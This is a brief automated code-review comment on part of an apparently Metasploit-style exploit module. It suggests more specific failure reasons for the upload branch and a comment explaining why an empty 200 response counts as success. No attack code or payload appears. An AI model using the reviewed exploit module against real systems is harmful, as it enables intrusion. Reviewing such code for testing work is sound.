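Review bot: `fail_with(Failure::Unknown, ...)` on the upload `else` branch collapses two distinct outcomes — no response at all (`res` nil) and a response that did not match the expected 200 with an empty body — into one reason; `Failure::Unreachable` for the first and `Failure::UnexpectedReply` for the second would make the failure cause visible in the log without reading the code. The success test `res.body.empty?` also deserves a why-comment, since an empty body is an unusual success signal: `# presumably the upload handler answers 200 with an empty body on success — confirm against the target`. The `exploit` method starts at the previous hunk and continues past the end of this one, so the handling of the final `send_request_cgi` result is not visible here.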
